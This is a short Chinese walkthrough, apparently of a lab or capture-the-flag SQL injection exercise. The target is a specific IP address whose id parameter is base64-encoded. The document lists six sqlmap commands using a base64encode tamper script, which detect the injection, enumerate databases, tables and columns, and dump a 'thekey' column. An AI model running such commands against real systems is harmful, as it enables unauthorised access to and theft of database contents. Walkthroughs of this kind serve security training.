一、粗略判断是否存在sql注入
1.访问链接:http://219.153.49.228:40602/

id=MQo= ------->有可能存在sql注入,并且看到id后面的参数可能是base64加密后的结果,我们尝试解密,解密结果为1
二、kali虚拟机精确判断
需注意(网站id采用的是base64加密的结果 故用sqlmap注入时也必须先用base64加密)
1.判断网站是否存在sql注入漏洞(设置level=4)
sqlmap -u http://219.153.49.228:42233/show.php?id=MQo= --tamper=base64encode --level=4

2.查看该网站下的数据库
sqlmap -u http://219.153.49.228:42233/show.php?id=MQo= --tamper=base64encode --level=4 --dbs

3.查看该网站当前使用的数据库
sqlmap -u http://219.153.49.228:42233/show.php?id=MQo= --tamper=base64encode --level=4 --current-db

4.查看当前使用数据库下面的表
sqlmap -u http://219.153.49.228:42233/show.php?id=MQo= --tamper=base64encode --level=4 -D test --tables
5.查看敏感表中的列名
sqlmap -u http://219.153.49.228:42233/show.php?id=MQo= --tamper=base64encode --level=4 -D test -T data --columns

6.爆破敏感列名下的元素
sqlmap -u http://219.153.49.228:42233/show.php?id=MQo= --tamper=base64encode --level=4 -D test -T data -C thekey --dump

得到key,SQL注入成功!
本文介绍了如何通过粗略判断和Kali虚拟机,利用sqlmap工具对一个网站进行精确的SQL注入检测,包括解密参数、识别漏洞、探索数据库结构并获取敏感信息的过程。
1060

被折叠的 条评论
为什么被折叠?



